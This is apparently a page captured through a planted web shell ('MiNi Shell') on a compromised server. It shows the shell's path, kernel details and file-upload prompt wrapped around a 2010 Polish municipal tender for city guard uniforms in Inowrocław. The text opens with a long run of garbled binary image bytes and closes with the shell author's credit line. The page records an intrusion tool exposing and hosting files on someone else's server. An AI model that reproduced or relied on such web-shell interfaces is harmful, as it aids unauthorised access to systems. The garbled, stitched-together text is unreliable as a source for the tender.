JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100504/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100504/121710-N-2010.html

<p class="kh_header"><b>Inowrocław: Wykonanie i dostawa umundurowania dla funkcjonariuszy Komendy Straży Miejskiej Inowrocławia</b><br>
<b>Numer ogłoszenia: 121710 - 2010; data zamieszczenia: 04.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Inowrocław , ul. F. D. Roosevelta 36, 88-100 Inowrocław, woj. kujawsko-pomorskie, tel. 52 3555250, faks 52 3555233.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.inowroclaw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie i dostawa umundurowania dla funkcjonariuszy Komendy Straży Miejskiej Inowrocławia.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonanie i dostawa przez okres czterech lat elementów umundurowania dla funkcjonariuszy Komendy Straży Miejskiej Inowrocławia. Dostarczane umundurowanie musi być zgodne z rozporządzeniem Rady Ministrów z dnia 28 lipca 1998 r. w sprawie umundurowania, legitymacji, dystynkcji i znaków identyfikacyjnych strażników gminnych (miejskich) (Dz. U. Nr 112, poz. 71, z późn. zm., w tym rozporządzeniem RM z dnia 10.12.2009 r. zmieniającym rozporządzenie), zwanym dalej rozporządzeniem.

2. Zakres dostawy, wymagania oraz przewidywane ilości dostaw umundurowania:

1) spodnie letnie ciemny granat o kroju prostym z żółtymi lampasami, z możliwością regulacji obwodu pasa (gabardyna o gramaturze 340 g, 45% wełny) w pasie wykończenie taśmą z gumy antypoślizgowej - 300 par;
2) spodnie zimowe ciemny granat  o kroju prostym z żółtymi lampasami możliwością regulacji obwodu pasa (gabardyna o gramaturze 480g, 45% wełny)                                                                                                                                w pasie wykończenie taśmą z gumy antypoślizgowej - 150 par;
3) spodnie moro z tkaniny beaver nylon lub elanobawełny, kolor czarny, możliwość regulacji obwodu pasa poprzez wstawione z boku ściągacze z gumką, odpinane szelki ze wzmocnioną gumą, kolana podszyte tkaniną bawełnianą zapobiegającą wypychaniu się kolan, kieszenie na udach z przodu i z tyłu na obu nogawkach zapinane na kryte guziki oraz dwie kieszenie tradycyjne, nogawki zakończone ściągaczem z gumką -150 par;
4) spodnie w kolorze ciemny granat, o kroju zwężonym, wpuszczane w obuwie, typu  narciarki ( gabardyna o gramaturze 420g, 45% wełny) - 150 par  
5) spódnica damska letnia o kroju prostym, w kolorze ciemny granat,  z podszewką (gabardyna 480g lub z materiału tropik) - 20 szt.;
6) spódnica damska zimowa o kroju prostym, w kolorze ciemny granat,  z podszewką (gabardyna 480g lub z materiału tropik) - 20 szt.;
7) spodenki krótkie w kolorze ciemny granat, przystosowane do jazdy na rowerze z dwoma kieszonkami po bokach zapinanymi na zamek - 15 par;
8) koszula z krótkim rękawem w kolorze białym lub błękitnym - wzór wg załącznika nr 1  do rozporządzenia, dodatkowo nad kieszenią na lewej piersi wzmocnienie i naszyta patka przystosowana do umocowywania blachy z numerem służbowym, na ramionach naszyte pagony na guziki - 300 szt.; 
9) koszula z długim rękawem w kolorze białym lub błękitnym - wzór wg załącznika nr 1 do rozporządzenia - 300 szt.;
10) koszulobluza w kolorze ciemny granat i jasny granat - wzór wg zał. nr 1 do rozporządzenia, tkanina figaro, dodatkowo nad kieszenią na lewej piersi wzmocnienie i naszyta patka przystosowana do umocowywania blachy z numerem służbowym - 75 szt.; 
11) koszulka typu polo z kołnierzem, zapinana z przodu na trzy guziki, tył           jednoczęściowy, rękawy krótkie jednoczęściowe, I gatunek, bawełna - czesana 100 %, kolor ciemny granat lub biały, na lewej piersi naszyta kieszeń zapinana na kryte guziki lub rzep, nad kieszenią naszyta patka przystosowana do przypinania blachy z numerem    służbowym, na ramionach naszyta tkanina bawełniana oraz pagony zapinane na guziki, z tyłu napis nadrukowany STRAŻ MIEJSKA - 120 szt.;
12) podkoszulka typu T-shirt, kolor ciemny granat lub biały, I gatunek, rękawy krótkie jednoczęściowe, bawełna - czesana 100 %, z tyłu napis nadrukowany           STRAŻ MIEJSKA - 160 szt.;	
13) podkoszulka letnia i zimowa w kolorze białym, na  ramiączkach, bawełna I gatunek - 320 szt.;
14) sweter mundurowy ciemny granat, półgolf  - wzór wg zał. nr 1 do rozporządzenia, dodatkowo nad kieszenią na lewej piersi wzmocnienie i naszyta patka przystosowana do umocowywania blachy z numerem służbowym oraz pagony na ramionach zapinane na guziki - 150 szt.;
15) Sweter ciemny granat, w tzw. serek, nad kieszenią na lewej piersi wzmocnienie i naszyta patka przystosowana do umocowania blachy z numerem służbowym - wzór wg zał. nr 1 do rozporządzenia - 150 szt.; 
16) sweter ciemny granat, typu bezrękawnik - 150 szt.;
17) kamizelka ostrzegawcza z napisami fosforyzującymi STRAŻ MIEJSKA, z przodu i z tyłu  - 75 szt.;
18) kurtka krótka z bezrękawnikiem w kolorze ciemny granat, razem z napisami
fosforyzującymi z przodu i z tylu zarówno na kurtce jak i bezrękawniku, dodatkowo nad kieszenią na lewej piersi wzmocnienie i naszyta patka przystosowana do umocowania blachy z numerem służbowym zarówno na kurtce jak i bezrękawniku, bezrękawnik wykończony stójką, tkanina nieprzemakalna, naszyte pagony na ramionach zapinane na guziki. wzór  zgodnie z zał. nr 1 do rozporządzenia - 75 szt.;        
19) kurtka ? z podpinką w kolorze ciemny granat, tkanina nieprzemakalna,  podpinka również w rękawach, razem z napisem fosforyzującym STRAŻ MIEJSKA z przodu i z tyłu, dodatkowo nad kieszenią na lewej piersi wzmocnienie i naszyta patka przystosowana do umocowania blachy z numerem służbowym oraz pagony na ramionach zapinane na guziki. wzór  zgodnie z zał. nr 1 do rozporządzenia  - 70 szt.;       
20) marynarka wyjściowa damska w kolorze ciemny granat, zapinana   na dwa guziki, z dwoma kieszonkami po bokach i jedną kieszenią wewnętrzną wraz z naszytymi zapinanymi na guzik pagonami na ramionach (gabardyna 480 g) zgodnie z zał. nr 1 do rozporządzenia  - 10 szt.; 
21) marynarka wyjściowa męska w kolorze ciemny granat, zapinana   na dwa guziki, z dwoma kieszonkami po bokach i jedną kieszenią wewnętrzną wraz z naszytymi zapinanymi na guzik pagonami na ramionach (gabardyna 480 g) zgodnie z zał. nr 1 do rozporządzenia  - 60 szt.; 
22) płaszcz zimowy wyjściowy damski w kolorze ciemny granat, zapinany na trzy guziki, z dwoma kieszeniami po bokach i jedną kieszenią wewnętrzną, razem z podpinką w rękawach, na ramionach pagony zapinane na guziki,  wg wzoru zgodnego z zał. nr 1 do rozporządzenia - 10 szt.;
23) płaszcz zimowy wyjściowy męski w kolorze ciemny granat, zapinany na trzy guziki, z dwoma kieszeniami po bokach i jedną kieszenią wewnętrzną, razem z podpinką w rękawach, na ramionach pagony zapinane na guziki, wg wzoru zgodnego z zał. nr 1 do rozporządzenia - 20 szt.;
24)  płaszcz letni wyjściowy damski, komponenty takie same jak  w przypadku płaszcza zimowego powyżej - 10 szt.; 
25) płaszcz letni wyjściowy męski, komponenty takie same jak  w przypadku płaszcza zimowego powyżej - 20 szt.;
26) peleryna nieprzemakalna z kapturem w kolorze ciemny granat lub czarny wykonana z tkaniny impregnowanej - 30 szt.;
27) czapka garnizonowa okrągła w kolorze ciemny granat, gabardynowa, z daszkiem i paskiem skórzanym w kolorze czarnym, oraz orzełkiem metalowym i otokiem w szachownicę żółto-granatową, dodatkowo od wewnątrz wkładka pomiędzy daszkiem a usztywnieniem, wzór wg zał. nr 4 do rozporządzenia - 70 szt.;
28) czapka służbowa typu baseball, gabardynowa w kolorze ciemnogranatowym z orzełkiem i otokiem w szachownicę, wzór wg zał. nr 4 do rozporządzenia - 70 szt;
29) kapelusz damski, gabardynowy, w kolorze ciemny granat wraz z orzełkiem i otokiem w szachownicę, zgodnie ze wzorem w zał. nr 4 do rozporządzenia  - 10 szt.;
30) czapka zimowa typu - uszanka z daszkiem-, w kolorze ciemny granat wraz  z orzełkiem i otokiem w szachownicę, z futerkiem wewnątrz, zgodnie z zał. nr 4 do rozporządzenia - 75 szt.;
31) półbuty męskie - wykonane z naturalnej skóry licowej w kolorze czarnym, podszewka ze skóry naturalnej, podeszwa trudnościeralna i antypoślizgowa w kolorze czarnym, szeroki nosek, wkładka klejona na całej powierzchni buta - 300 par;
32) półbuty damskie - wykonane z naturalnej skóry licowej w kolorze czarnym, podszewka ze skóry naturalnej, podeszwa trudnościeralna i antypoślizgowa w kolorze czarnym, wysokość obcasa w tyle do 4,5 cm, wkładka klejona na całej powierzchni buta - 32 pary;
33)  buty zimowe - wykonane z naturalnej skóry licowej w kolorze czarnym, podszewka ze skóry naturalnej, wnętrze ocieplane, cholewki wysokie, podeszwa trudnościeralna w kolorze czarnym z bieżnikiem antypoślizgowym typu traper, system szybkiego wiązania - 160 par;
34) buty nieocieplane typu traper, wykonane z naturalnej skóry licowej w kolorze czarnym, podszewka ze skóry naturalnej, wnętrze nieocieplane, cholewki wysokie, podeszwa trudnościeralna w kolorze czarnym z bieżnikiem antypoślizgowym, system szybkiego wiązania - 160 par;
35) buty specjalne sportowe, przystosowane do jazdy na rowerze - 32 pary;
36) pasek do spodni skórzany kolor czarny standardowy  - 70 szt.;
37) pasek do spodni szeroki -główny- skórzany w kolorze czarnym ze złotą klamrą - 70 sz.;	
38) krawat czarny - wzór wg załącznika nr 1 do rozporządzenia - 60 szt.;
39) spinka do krawata w kolorze złotym z wizerunkiem orła w koronie - 60 szt.;
40) saszetka na dokumenty skórzana kolor czarny umocowywana do pasa służbowego, jednokomorowa  - 40 szt.;
41)  kaski ochronne w kolorze ciemnym, przystosowane do jazdy na rowerze -10 szt.;
42) rękawiczki zimowe skórzane w kolorze czarnym ocieplane - 40 par;
43)  rękawiczki specjalne przystosowane do jazdy na rowerze - 10 par;			       
44) futerał na kajdanki w kolorze czarnym umocowywany do pasa służbowego  - 40 szt.;
45) szalik zimowy w kolorze ciemny granat	- 40 szt.;
46) szalik do stroju wyjściowego w kolorze białym - 20 szt.;
47) skarpety letnie w kolorze czarnym lub ciemny granat - 400 par;
48) skarpety zimowe w kolorze czarnym lub ciemny granat, ocieplany spód - 300 par;
49) rajstopy damskie w kolorze ciemnym i jasnym, letni i zimowe - 20 par;
50) muszka damska - 10 szt.;
51) markowe kajdanki ze stali nierdzewnej polerowanej - 30 szt.;
52)  pałka typu TONFA, atestowana - 50 szt.;
53) dystynkcje haftowane, zgodnie z zał. nr 3  do rozporządzenia z dnia 10 grudnia 2009 r. - 120 par
54) pokrowiec w kolorze czarnym na kajdanki stalowe, przymocowywany do paska głównego - 40 szt.;
55)  etui skórzane w kolorze czarnym na legitymacje służbowe - 40 szt.;
56)  uchwyty skórzane w kolorze czarnym, służące do przymocowania pałki typy TONFA do paska głównego - 50 szt.;
57)  sznur galowy w kolorze żółtym jednakowy dla wszystkich strażników - wzór zgodny z zał. nr 6 do rozporządzenia -  40 szt.;
58)  emblematy STRAŻ MIEJSKA - 120 szt.;
59) korpusówki Straży Miejskiej - 100  szt.

3. Zamawiający przewiduje  okresowe dostawy umundurowania dwa razy w roku, lecz zastrzega sobie możliwość częstszych dostaw, jeżeli wystąpi taka potrzeba. Zamówienie okresowe prześle wykonawcy Komenda Straży Miejskiej Inowrocławia, za pośrednictwem faksu. W zleceniu zostaną określone szczegółowe rozmiary zamawianego umundurowania oraz termin wykonania (nie krótszy niż 30 dni, licząc od dnia przesłania zlecenia). 
4. Wykonawca będzie dostarczał zamówione umundurowanie własnym transportem i na swój koszt, do siedziby Komendy Straży Miejskiej w Inowrocławiu przy ulicy Narutowicza nr 60.
5. Warunki finansowania zamówienia - zapłata za przedmiot zamówienia nastąpi po jego odbiorze bez zastrzeżeń i otrzymaniu faktury (oddzielnie za każdą dostawę okresową), w terminie  do 30 dni od jej otrzymania, przelewem na rachunek bankowy Wykonawcy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Umundurowanie funkcjonariuszy Komendy Straży Miejskiej Inowrocławia, do 20% wartości zamówienia podstawowego (rozszerzenie dostawy)</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 18.00.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 48.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o udzielenie zamówienia mogą ubiegać się wykonawcy, którzy w okresie ostatnich trzech lat wykonali  (lub wykonują)  co najmniej dwie dostawy umundurowania. Spełnianie warunku zostanie ocenione na podstawie złożonego wykazu wykonanych dostaw umundurowania wraz z dokumentami potwierdzającymi, że te dostawy zostały wykonane lub są wykonywane należycie, na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie określa się minimalnych standardów. Spełnianie warunku zostanie ocenione na podstawie złożonego oświadczenia, na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie określa się minimalnych standardów. Spełnianie warunku zostanie ocenione na podstawie złożonego oświadczenia, na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie określa się minimalnych standardów. Spełnianie warunku zostanie ocenione na podstawie złożonego oświadczenia, na zasadzie spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1) fotografie  oferowanych elementów umundurowania z załączonym szczegółowym opisem,
2) próbki trzech oferowanych elementów umundurowania: kurtka ? z podpinką, marynarka wyjściowa, letnie spodnie. 
3) formularz ofertowy.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Zamawiający żąda, aby wykonawca do oferty załączył dokument lub dokumenty, z których będzie wynikać uprawnienie do podpisania oferty, np. aktualny odpis z właściwego rejestru, aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, aktualny statut spółki lub aktualny rejestr handlowy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 70.00</li>
<li>2 - Jakość - 30.00</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość wprowadzenia zmian do zawartej umowy w przypadku:
a)	zmiany stawki VAT,
b)	zmiany przez zamawiającego ilości  zamawianych elementów umundurowania;
c)	zmiany terminów okresowych dostaw umundurowania, jeżeli zajdą nieprzewidziane dla stron okoliczności;
d)	zmiany cen jednostkowych elementów umundurowania, na wniosek wykonawcy, nie wcześniej niż po upływie 1 roku wykonywania zamówienia, nie więcej niż o średnioroczny wskaźnik zmiany cen towarów i usług konsumpcyjnych.
Warunkiem wprowadzenia zmian do zawartej umowy będzie pisemne  uzasadnienie zmian, podpisane przez wykonawcę i zamawiającego.  Zmiana postanowień zawartej umowy  wymaga formy pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.inowroclaw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Inowrocławia, 88-100 Inowrocław, ul. Roosevelta 36, Zespół zamówień publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.05.2010 godzina 10:00, miejsce: Urząd Miasta Inowrocławia, 88-100 Inowrocław, ul. Roosevelta 36, punkt informacyjno-podawczy Biura Obsługi Interesantów i Kontroli.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com